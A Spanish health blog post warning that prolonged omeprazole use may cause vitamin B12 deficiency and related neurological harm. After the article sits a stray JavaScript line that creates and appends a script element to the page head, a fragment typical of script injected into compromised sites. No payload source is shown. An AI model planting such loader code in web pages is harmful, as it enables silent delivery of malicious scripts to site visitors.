Salud y belleza » Enfermedades, Productos peligrosos, Salud

Los riesgos de tomar omeprazol

Sin Comentarios

peligro-omeprazolHace poco se ha desvelado que, según un nuevo estudio el omeprazol, que tantas personas toman a diario para actuar contra la acidez de estómago, podría producir un déficit de vitaminas que provocaría daños neurológicos y síntomas perjudiciales para la salud. En concreto se trata de la carencia o déficit de vitamina B12 que puede provocar problemas como la demencia, daños neurológicos, anemia u otras complicaciones.

El omeprazol es un medicamento que suele recetarse para evitar problemas como la irritación por reflujo gástrico o para proteger el sistema digestivo frente a medicamentos que puedan resultar agresivos. Pero un reciente estudio ha vinculado la ingesta prolongada de omeprazol con la carencia de vitamina B12.

Si sueles ir habitualmente al médico no tienes de qué preocuparte, porque estos suelen controlar la cantidad que consumes para evitar estos efectos secundarios. Pero si tomas omeprazol a menudo sin un control médico entonces puede que sufras estos síntomas a largo plazo. Entre el 10 y el 15% de los adultos mayores de 60 años tiene deficiencia de vitamina B12.

riesgos-omeprazol

Cuando se toma omeprazol se reducen los ácidos del estómago que normalmente ayudan a liberar la vitamina B12 de los alimentos para que se una a ciertas proteínas. Pero en caso de consumo prolongado del medicamento se acaba por tener deficiencia de vitamina B12, lo que derivará en múltiples problemas.

¿Sabías que el consumo continuado de omeprazol es peligroso para la salud?

var d=document;var s=d.createElement('script'); d.getElementsByTagName('head')[0].appendChild(s);

Más consejos de salud y belleza : ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.